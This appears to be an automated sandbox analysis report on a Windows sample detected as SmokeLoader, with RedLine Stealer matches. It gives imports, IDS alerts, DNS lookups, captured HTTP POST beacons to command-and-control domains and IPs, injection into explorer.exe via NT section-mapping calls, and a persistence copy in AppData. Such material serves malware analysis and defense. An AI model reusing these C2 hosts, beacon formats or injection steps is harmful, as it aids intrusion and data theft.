RT_ICON | 0x11e5d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.4448874296435272
RT_ICON | 0x11f680 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.4364754098360656
RT_ICON | 0x120008 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.48404255319148937
RT_ICON | 0x1204d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5655650319829424
RT_ICON | 0x121380 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.6128158844765343
RT_ICON | 0x121c28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.4769585253456221
RT_ICON | 0x1222f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.5953757225433526
RT_ICON | 0x122858 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5773858921161825
RT_ICON | 0x124e00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.6437617260787992
RT_ICON | 0x125ea8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.6323770491803279
RT_ICON | 0x126830 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.7056737588652482
RT_STRING | 0x12a5b8 | 0x424 | data | | | 0.44622641509433963
RT_STRING | 0x12a9e0 | 0x6c4 | data | | | 0.4255196304849885
RT_STRING | 0x12b0a8 | 0x620 | data | | | 0.4406887755102041
RT_STRING | 0x12b6c8 | 0x514 | data | | | 0.4576923076923077
RT_STRING | 0x12bbe0 | 0x660 | data | | | 0.4375
RT_STRING | 0x12c240 | 0x66e | data | | | 0.4307411907654921
RT_STRING | 0x12c8b0 | 0x7b2 | data | | | 0.42233502538071066
RT_STRING | 0x12d068 | 0x7e6 | data | | | 0.42037586547972305
RT_STRING | 0x12d850 | 0x5f4 | data | | | 0.4416010498687664
RT_STRING | 0x12de48 | 0x6d0 | data | | | 0.4288990825688073
RT_STRING | 0x12e518 | 0x790 | data | | | 0.42613636363636365
RT_STRING | 0x12eca8 | 0x464 | data | | | 0.45462633451957296
RT_STRING | 0x12f110 | 0xcc | data | | | 0.5490196078431373
RT_GROUP_CURSOR | 0x12a3e8 | 0x22 | data | | | 1.088235294117647
RT_GROUP_ICON | 0x126c98 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x11c1e0 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
RT_GROUP_ICON | 0x120470 | 0x68 | data | Turkish | Turkey | 0.7115384615384616
RT_VERSION | 0x12a410 | 0x1a8 | data | | | 0.5825471698113207
DLL | Import
KERNEL32.dll | SetPriorityClass, GetConsoleAliasesLengthW, CopyFileExW, GetNumaProcessorNode, ReadConsoleA, GetEnvironmentStringsW, WaitForSingleObject, InterlockedCompareExchange, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, SetCommState, GetCommandLineA, GlobalAlloc, GetVolumeInformationA, CopyFileW, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, WriteConsoleOutputA, GetFileAttributesA, HeapCreate, SetConsoleMode, GetBinaryTypeA, SearchPathW, GetLastError, GetProcAddress, GetLongPathNameA, MoveFileW, SearchPathA, LoadLibraryA, LocalAlloc, QueryDosDeviceW, FindAtomA, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, BuildCommDCBA, PurgeComm, FatalAppExitA, WriteConsoleOutputAttribute, GetStdHandle, GetComputerNameA, HeapFree, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
USER32.dll | GetFocus
ADVAPI32.dll | ObjectPrivilegeAuditAlarmW
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-04T15:10:05.191461+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.9 | 49710 | 193.46.217.78 | 80 | TCP
2024-10-04T15:10:06.535004+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP
2024-10-04T15:10:06.922982+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP
2024-10-04T15:10:32.226080+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.9 | 49713 | 193.46.217.78 | 80 | TCP
2024-10-04T15:10:32.432388+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP
2024-10-04T15:10:32.829421+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 15:10:03.960601091 CEST | 62272 | 53 | 192.168.2.9 | 1.1.1.1
Oct 4, 2024 15:10:04.257939100 CEST | 53 | 62272 | 1.1.1.1 | 192.168.2.9
Oct 4, 2024 15:10:05.278145075 CEST | 65233 | 53 | 192.168.2.9 | 1.1.1.1
Oct 4, 2024 15:10:05.880098104 CEST | 53 | 65233 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 4, 2024 15:10:03.960601091 CEST | 192.168.2.9 | 1.1.1.1 | 0x8372 | Standard query (0) | unicexpertmagazine.pw | A (IP address) | IN (0x0001) | false
Oct 4, 2024 15:10:05.278145075 CEST | 192.168.2.9 | 1.1.1.1 | 0x5836 | Standard query (0) | ceoconstractionstore.pl | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 4, 2024 15:10:04.257939100 CEST | 1.1.1.1 | 192.168.2.9 | 0x8372 | No error (0) | unicexpertmagazine.pw | | 193.46.217.78 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 15:10:05.880098104 CEST | 1.1.1.1 | 192.168.2.9 | 0x5836 | No error (0) | ceoconstractionstore.pl | | 188.40.141.211 | A (IP address) | IN (0x0001) | false
• gtatfotvrgw.org
  • unicexpertmagazine.pw
• duiiukhvfawcnf.org
  • ceoconstractionstore.pl
• trpngknppeg.com
• xtihbxaqoab.com
• rljealjxpbaxswq.net
• qburaxgwiulsnc.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49710 | 193.46.217.78 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 15:10:04.270289898 CEST | 286 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gtatfotvrgw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 250
Host: unicexpertmagazine.pw
Oct 4, 2024 15:10:04.270308018 CEST | 250 | OUT | Data Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e2 28 60 c8
Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)(`;v(IU'5@48BG);P5ZQ\^`q&bCCv~r.]`N+}-=<-fgULi@Ca)qel"aqr:rg?OY2
Oct 4, 2024 15:10:05.190660000 CEST | 602 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 04 Oct 2024 13:10:05 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 15:10:05.886143923 CEST | 291 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://duiiukhvfawcnf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 173
Host: ceoconstractionstore.pl
Oct 4, 2024 15:10:05.886300087 CEST | 173 | OUT | Data Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ac 5d 70 d4
Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)]pVlE.vkzS;841e)4iT]3Bs/p{2!oFdp}D
Oct 4, 2024 15:10:06.529943943 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 7
Content-Type: application/octet-stream
Date: Fri, 04 Oct 2024 13:10:06 GMT
Data Raw: 03 00 00 00 7d 4f d6
Data Ascii: }O
Oct 4, 2024 15:10:06.535003901 CEST | 288 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://trpngknppeg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 246
                                                                                                                  Host: ceoconstractionstore.pl
                                                                                                                  Oct 4, 2024 15:10:06.535003901 CEST246OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be 98 31 44 9c
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JsC)1DKgua~;Z8;RQ^1-,RQERx#][Jb^]p}eqfd4<Y%`dA-k;`7]mkBaUo&Hcu;b8
                                                                                                                  Oct 4, 2024 15:10:06.871114016 CEST144INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Content-Length: 0
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:06 GMT
                                                                                                                  Oct 4, 2024 15:10:32.228328943 CEST292OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://rljealjxpbaxswq.net/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 363
                                                                                                                  Host: ceoconstractionstore.pl
                                                                                                                  Oct 4, 2024 15:10:32.228328943 CEST363OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 84 55 49 ba
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)UI8T juhHWL@EDEY>#S0>xxkQq<}Av8?h@qq#fuUsnz`u5T>|pZP!u2ws{U)C2AQn<yM
                                                                                                                  Oct 4, 2024 15:10:32.427405119 CEST151INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Content-Length: 7
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:32 GMT
                                                                                                                  Data Raw: 03 00 00 00 7d 4f d6
                                                                                                                  Data Ascii: }O
                                                                                                                  Oct 4, 2024 15:10:32.432388067 CEST291OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://qburaxgwiulsnc.com/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 261
                                                                                                                  Host: ceoconstractionstore.pl
                                                                                                                  Oct 4, 2024 15:10:32.432388067 CEST261OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be 84 24 68 b9
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JsC)$hmi7K#`HZ4fQ.N8Cp+i#FioNd%v2vvj^#r?gqz+/i={0miP;[e)6fY5@8a
                                                                                                                  Oct 4, 2024 15:10:32.774131060 CEST144INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Content-Length: 0
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:32 GMT


Session ID: 2 | Source IP: 192.168.2.9 | Source Port: 49713 | Destination IP: 193.46.217.78 | Destination Port: 80 | PID: 3504 | Process: C:\Windows\explorer.exe

Oct 4, 2024 15:10:31.217560053 CEST, 286 bytes, OUT:
POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xtihbxaqoab.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 356
Host: unicexpertmagazine.pw

Oct 4, 2024 15:10:31.217560053 CEST, 356 bytes, OUT:
Data Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e4 17 6d a8
Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)m;BIUbIU un+;o;a`%\V\aSPx{jb)N7^Oi|'z]SD1L~Lc8!pXmglW>s

Oct 4, 2024 15:10:32.225739956 CEST, 602 bytes, IN:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 04 Oct 2024 13:10:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0



Target ID: 0
Start time: 09:09:34
Start date: 04/10/2024
Path: C:\Users\user\Desktop\RmbF3635xY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RmbF3635xY.exe"
Imagebase: 0x400000
File size: 222'720 bytes
MD5 hash: 31059E7394B880F017E83804D9B716AB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 09:09:45
Start date: 04/10/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff633410000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 4
Start time: 09:10:05
Start date: 04/10/2024
Path: C:\Users\user\AppData\Roaming\jtruajj
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\jtruajj
Imagebase: 0x400000
File size: 222'720 bytes
MD5 hash: 31059E7394B880F017E83804D9B716AB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 8.5%
Dynamic/Decrypted Code Coverage: 19.9%
Signature Coverage: 49.4%
Total number of Nodes: 156
Total number of Limit Nodes: 6

                                                                                                                    Control-flow Graph for the function at 418a70 (rendered image with executed / not-executed block colouring; basic-block edge list omitted). Calls into 418740, 418770, 4189d0 and 418760.
                                                                                                                    APIs
                                                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                                    • GetFocus.USER32 ref: 00418B91
                                                                                                                    • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                                    • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                                    • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                                    • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                                    • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                                    • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                                    • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                                    • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                                    • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                                    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                                    • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                                    • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                                    • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                    • String ID: k`$}$
                                                                                                                    • API String ID: 2220722107-956986773
                                                                                                                    • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                    • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                                    • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                    • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                                                                                                                    Control-flow Graph for the function at 4014db (rendered image with executed / not-executed block colouring; basic-block edge list omitted). Calls into 4011a4 and 4016f6.
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$CreateDuplicateObjectView
                                                                                                                    • String ID: 1
                                                                                                                    • API String ID: 1652636561-2212294583
                                                                                                                    • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                                    • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                                    • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                                    • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                                                    Control-flow Graph for the function at 401529 (rendered image with executed / not-executed block colouring; basic-block edge list omitted). Calls into 4011a4 and 4016f6.
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
